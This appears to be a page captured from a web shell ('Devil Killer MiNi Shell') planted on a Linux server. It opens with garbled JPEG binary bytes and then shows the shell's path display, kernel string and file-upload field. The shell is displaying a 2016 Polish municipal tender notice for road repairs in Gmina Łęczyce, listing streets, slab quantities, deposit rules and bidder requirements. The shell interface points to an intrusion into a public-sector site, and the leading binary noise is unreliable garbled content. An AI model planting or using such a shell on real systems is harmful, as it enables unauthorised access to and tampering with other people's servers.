JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160725/155035-N-2016.html

<p class="kh_header"><b>Łęczyce: Remont dróg gminnych poprzez utwardzenie płytami IOMB</b><br>
<b>Numer ogłoszenia: 155035 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łęczyce , ul. Długa 49, 84-218 Łęczyce, woj. pomorskie, tel. 58 6789214, faks 58 6789125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.leczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych poprzez utwardzenie płytami IOMB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie utwardzeń płytami betonowymi typu IOMB dróg  wewnętrznych gruntowych będących w zarządzie Gminy Łęczyce w ramach zadania inwestycyjnego Gminy Łęczyce pn.: Remonty dróg gminnych poprzez utwardzenia nawierzchni płytami IOMB -  Zakres I 2016 r.: Bożepole Wielkie, Bożepole Małe, Chmieleniec + projekt odwodnienia ul. Osiedlowej w Strzebielnie Osiedlu, Brzeźno Lęborskie, Kisewo, Strzelęcino, Dąbrowa Brzezieńska, Dzięcielec, Nawcz, Kaczkowo, Dzięcielec Wybudowanie, Łówcz Górny, Świetlino, Zakres II 2017 r.: Strzebielino Osiedle + odwodnienia: ul. Osiedlowa w Strzebielinie Osiedlu, Rozłazino, Łęczyce. 

UWAGA: w zakres zamówienia nie wchodzi wykonanie odwodnienia ul. Osiedlowej 
w Strzebielinie Osiedlu.

Zakres przedmiotu zamówienia obejmuje: Remonty dróg gminnych poprzez utwardzenia nawierzchni płytami IOMB -  w miejscowościach:

1)	Świetlino
a.	droga wewnętrzna - dz. nr 29 		(dł.: 150,0 m, szer. 4,50 m)
2)	Kaczkowo, 
a.	droga wewnętrzna - dz. nr 59		(dł.: 230,0 m, szer. 4,50 m)
b.	droga wewnętrzna - dz. nr 179		(dł.: 150,0 m, szer. 4,50 m)
3)	Dąbrowa Brzezieńska
a.	droga wewnętrzna - dz. nr 143/1		(dł.: 170,0 m, szer. 4,50 m)
4)	Strzelęcino, 
a.	droga wewnętrzna - dz. nr 33, 36		(dł.: 430,0 m, szer. 4,50 m)
5)	Kisewo
a.	droga wewnętrzna - dz. nr 86 i 132		(dł.: 820,0 m, szer. 4,50 m)
6)	Brzeźno Lęborskie
a.	droga wewnętrzna - dz. nr 37		(dł.:   50,0 m, szer. 4,50 m)
b.	droga wewnętrzna - dz. nr 34		(dł.: 210,0 m, szer. 3,00 m)
c.	droga wewnętrzna - dz. nr 155		(dł.: 110,0 m, szer. 4,50 m)
d.	droga wewnętrzna - dz. nr 158/2		(dł.: 220,0 m, szer. 4,50 m)
7)	Łówcz Górny
a.	droga wewnętrzna - dz. nr 128/1		(dł.: 320,0 m, szer. 4,50 m)
8)	Nawcz
a.	droga wewnętrzna - dz. nr 197		(dł.: 100,0 m, szer. 4,50 m)
b.	droga wewnętrzna - dz. nr 239/2		(dł.: 180,0 m, szer. 3,75 m)
c.	droga wewnętrzna - dz. nr 252		(dł.: 130,0 m, szer. 3,75 m)
9)	Dzięcielec, 
a.	droga wewnętrzna - dz. nr 184, 185/4	(dł.: 280,0 m, szer. 4,50 m)
b.	droga wewnętrzna - dz. nr 145		(dł.: 145,0 m, szer. 3,75 m)
10)	Dzięcielec Wybudowanie
a.	droga wewnętrzna - dz. nr 85, 91		(dł.: 450,0 m, szer. 4,50 m)
11)	Chmieleniec 
a.	droga do cmentarza dz. nr 197/1, 166/5	(dł.: 1300,0 m, szer. 4,50 m)
12)	Bożepole Wielkie 
a.	ul. Łąkowa				(dł.: 570,0 m, szer. 4,50 m)
b.	ul. Sportowa	 			(dł.: 260,0 m, szer. 4,50 m)
c.	ul. Zielona	 			(dł.: 130,0 m, szer. 5,25 m)
d.	ul. Kwiatowa	 			(dł.: 220,0 m, szer. 5,25 m)
e.	ul. Słoneczna	 			(dł.: 220,0 m, szer. 5,25 m)
f.	ul. Sadowa				(dł.: 220,0 m, szer. 5,25 m)
g.	ul. Jasna 				(dł.: 120,0 m, szer. 4,50 m)
h.	ul. Spokojna				(dł.: 570,0 m, szer. 4,50 m)
i.	ul. Rzemieślnicza			(dł.: 250,0 m, szer. 5,25 m)
j.	ul. Miła				(dł.: 110,0 m, szer. 4,50 m)
k.	ul. Gackowskiego			(dł.: 185,0 m, szer. 5,25 m)
l.	ul. Ogrodowa				(dł.: 150,0 m, szer. 4,50 m)
m.	ul. Topolowa				(dł.: 315,0 m, szer. 5,25 m)
n.	ul. Akacjowa				(dł.: 195,0 m, szer. 5,25 m)
o.	ul. Dębowa				(dł.:   90,0 m, szer. 3,75 m)
p.	ul. Widok				(dł.:   70,0 m, szer. 3,75 m)
13)	Bożepole Małe, 
a.	ul. Lotników				(dł.: 375,0 m, szer. 5,25 m)
b.	ul. Zielna				(dł.:   80,0 m, szer. 4,50 m)
c.	ul. Przemysłowa - ul. Rzeczna	(dł.: 400,0 m, szer. 3,75 m)
d.	ul. Wiejska - ul. Krótka		(dł.: 330,0 m, szer. 4,50 m)
e.	ul. Polna  - ul. Paraszyńska		(dł.: 110,0 m, szer. 5,25 m)
f.	ul. Polna do strony S6			(dł.: 140,0 m, szer. 5,25 m)
g.	ul. Paraszyńska			(dł.:   60,0 m, szer. 5,25 m)
h.	droga do placu zabaw		(dł.:   60,0 m, szer. 4,50 m)
14)	Strzebielino:
a.	ul. Kwiatowa				(dł.: 110,0 m, szer. 4,50 m)
b.	ul. Starowiejska			(dł.: 210,0 m, szer. 5,25 m)
c.	ul. Zagrodowa				(dł.: 1387,0 m, szer. 4,50 m)
d.	ul. Kasprowicza			(dł.: 105,0 m, szer. 3,75 m)
e.	ul. Gdańska				(dł.: 110,0 m, szer. 4,50 m)
f.	ul. 1 Maja				(dł.: 155,0 m, szer. 5,25 m)
g.	ul. Sportowa				(dł.: 110,0 m, szer. 3,75 m)
h.	ul. Kaszubska				(dł.: 255,0 m, szer. 4,50 m)
i.	ul. Szkolna				(dł.: 400,0 m, szer. 3,75 m)
j.	ul. Konopnickiej			(dł.: 285,0 m, szer. 4,50 m)
k.	ul. Mickiewicza			(dł.: 300,0 m, szer. 5,25 m)
l.	ul. Żeromskiego			(dł.: 311,0 m, szer. 4,50 m)
m.	ul. Słowackiego			(dł.: 175,0 m, szer. 3,75 m)
n.	ul. Kostrzewy				(dł.: 220,0 m, szer. 3,75 m)
o.	ul. Nowa				(dł.: 130,0 m, szer. 3,75 m)
p.	ul. Stoczniowców			(dł.: 130,0 m, szer. 4,50 m)
q.	ul. Handlowa				(dł.: 155,0 m, szer. 4,50 m)
r.	ul. Słoneczna				(dł.: 110,0 m, szer. 5,25 m)
s.	ul. Łąkowa				(dł.: 100,0 m, szer. 3,75 m)
t.	ul. Wybickiego			(dł.: 310,0 m, szer. 4,50 m)
u.	ul. Staffa				(dł.:   50,0 m, szer. 4,50 m)
v.	ul. Zielna				(dł.: 390,0 m, szer. 4,50 m)
w.	ul. Ogrodowa				(dł.: 190,0 m, szer. 3,75 m)
x.	ul. C.K. Norwida			(dł.: 160,0 m, szer. 5,25 m)
y.	ul. Skłodowskiej			(dł.: 140,0 m, szer. 5,25 m)
z.	ul. Prusa				(dł.: 220,0 m, szer. 4,50 m)
aa.	ul. Reymonta				(dł.: 400,0 m, szer. 4,50 m)
bb.	ul. Brzechwy				(dł.: 285,0 m, szer. 5,25 m)
cc.	ul. P. Skargi				(dł.: 265,0 m, szer. 5,25 m)
dd.	ulica bez nazwy 			(dł.:   70,0 m, szer. 4,50 m)
ee.	Wyszyńskiego				(dł.: 130,0 m, szer. 5,25 m)
ff.	ul. Orzeszkowej 			(dł.: 200,0 m, szer. 4,50 m)
gg.	Łącznik I				(dł.: 120,0 m, szer. 4,50 m)
hh.	ul. Witosa				(dł.: 140,0 m, szer. 4,50 m)
ii.	ul. Drzymały				(dł.: 140,0 m, szer. 4,50 m)
jj.	Łącznik II				(dł.: 140,0 m, szer. 4,50 m)
kk.	ul. Piłsudskiego 			(dł.: 150,0 m, szer. 4,50 m)
15)	Rozłazino
a.	ul. Spokojna 				(dł.: 440,0 m, szer. 4,50 m)
b.	ul. Strażacka				(dł.: 190,0 m, szer. 4,50 m)
c.	ul. Okrężna				(dł.: 220,0 m, szer. 4,50 m)
d.	ul. Polna				(dł.: 270,0 m, szer. 3,75 m)
e.	ul. Krótka				(dł.:   70,0 m, szer. 3,75 m)
f.	droga wewnętrzna - dz. nr 683/4	(dł.: 150,0 m, szer. 4,50 m)
16)	Łęczyce
a.	ul. Okrężna 				(dł.: 250,0 m, szer. 4,50 m)
b.	ul. Młynarska				(dł.: 250,0 m, szer. 4,50 m)
c.	ul. Rzeczna				(dł.: 200,0 m, szer. 5,25 m)
d.	ul. Nowa 				(dł.: 120,0 m, szer. 4,50 m)
e.	ul. Wiejska				(dł.: 220,0 m, szer. 4,50 m)
f.	ul. Świerkowa				(dł.: 150,0 m, szer. 4,50 m)
g.	ul. Polna				(dł.:   85,0 m, szer. 4,50 m)
h.	ul. Łąkowa 				(dł.: 170,0 m, szer. 4,50 m)
i.	ul. Słoneczna				(dł.:   85,0 m, szer. 4,50 m)
j.	ul. Pocztowa				(dł.: 180,0 m, szer. 4,50 m)
17)	Godętowo
a.	droga wewnętrzna - dz. nr 34/10, 34/17 (dł.: 165,0 m, szer. 3,75 m)

Łącznie zamówienie obejmuje w szczególności: 
a)	wykonanie na drogach gruntowych utwardzeń z płyt betonowych typu IOMB (z płyt Wykonawcy) - zakładana ilość 98 705,75 m2 
b)	roboty towarzyszące w tym: 
-	naprawa dróg gruntowych urobkiem z korytowania dróg nie wykorzystanym jako podbudowa na projektowanych fragmentach ulic, a nadającym się do ponownego użycia jako materiał do konserwacji dróg gruntowych (wraz z profilowaniem równiarką drogową oraz mechanicznym zagęszczeniem walcem wibracyjnym) - zakładana ilość: 697 432,50 m2
-	wywóz nadmiaru gruntu (nie nadającego się  do ponownego użycia jako materiał do konserwacji dróg gminnych) w miejsce wskazane przez Zamawiającego- zakładana ilość: 20 774,28 m3
-	naprawa nawierzchni bitumicznej mieszanką mineralno - asfaltową na fragmentach istniejących zjazdów z dróg o nawierzchni asfaltowej - zakładana ilość: 23,45 t
-	wykonanie regulacji studni kanalizacyjnych i zasuw wodociągowych.

3.	Szczegółowy zakres robót budowlanych objętych zamówieniem wynika 
z projektów budowlanych (załącznik nr 5A dla zakresu I pozycja 1 ÷ 13 opisu przedmiotu zamówienia oraz załącznik nr 5B dla zakresu II pozycja 14  ÷ 17 opisu przedmiotu zamówienia) oraz specyfikacji technicznych wykonania i odbioru robót budowlanych, stanowiących załączniki do niniejszej SIWZ (odpowiednio nr 7A oraz 7B).

4.	Przedmiary robót, - odpowiednio załączniki nr 4A i 4B do SIWZ stanowią wyłącznie materiał pomocniczy - różnice pomiędzy ilościami wskazanymi w przedmiarze a rzeczywistą ilością robót niezbędnych do wykonania zamówienia nie mogą być podstawą do roszczeń wobec Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67, ust. 1, pkt. 6, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7, 45.23.31.23-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w kwocie 150000,00 zł (słownie: sto pięćdziesiąt tysięcy pięćset złotych). 2. Wadium może być wnoszone w jednej lub kilku następujących formach (art. 45 ust. 6 - 8 ustawy p.z.p.): 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego, tj.: Kaszubski Bank Spółdzielczy Wejherowo - Oddział Łęczyce, nr 73 8350 0004 3900 2437 2000 0070. 4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 5. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, określonym w dz. XIII niniejszej SIWZ. 6. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty rachunku Zamawiającego. 7. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w kasie urzędu lub dołączyć do oferty. 8. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy p.z.p., a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy p.z.p. 9. Zamawiający zwraca wadium wykonawcom, których oferta nie została wybrana lub wszystkim wykonawcom po unieważnieniu postępowania zgodnie z art. 46 ustawy p.z.p.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia, na podstawie oceny wykazu robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - wzór wykazu stanowi załącznik nr 8 do SIWZ. Z wykazu powinno wynikać, iż Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dwa zamówienia na roboty budowlane, których głównym przedmiotem była budowa lub przebudowa ulicy, drogi o nawierzchni z płyt betonowych typu IOMB/płyt drogowych, o wartości robót przekraczających 650000,00 zł brutto dla jednego zamówienia;
oraz że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia na podstawie oceny wykazu urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi urządzeniami - wzór wykazu stanowi załącznik nr 9. Z wykazu powinno wynikać, że Wykonawca będzie dysponował co najmniej sprzętem, określonym poniżej:
a) równiarka samojezdna trzyosiowa - minimum 1 szt.
b) walec wibracyjny o masie co najmniej 2,5 t - minimum 1 szt.
c) koparka kołowa o poj. łyżki 0,25 m3 - minimum 1 szt.
d) samochód ciężarowy o ładowności pow. 5 t - minimum 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/ nie spełnia, na podstawie oceny oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Wzór oświadczenia stanowi załącznik nr 10 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia, na podstawie: 1) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500.000,00 zł 2) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Z informacji powinno wynikać, iż wykonawca posiada środki finansowe w wysokości 500.000,00 zł lub zdolność kredytową w wysokości 500.000,00 zł,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga złożenia także:

1) oferty, sporządzonej wg wzoru który stanowi załącznik nr 1 do SIWZ;
2) kosztorysu ofertowego w formie zgodnej z obowiązującymi przepisami prawa dla tego typu dokumentów
3) pełnomocnictwa dla osoby składającej ofertę w przypadku działania Wykonawcy przez pełnomocnika;
4) pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
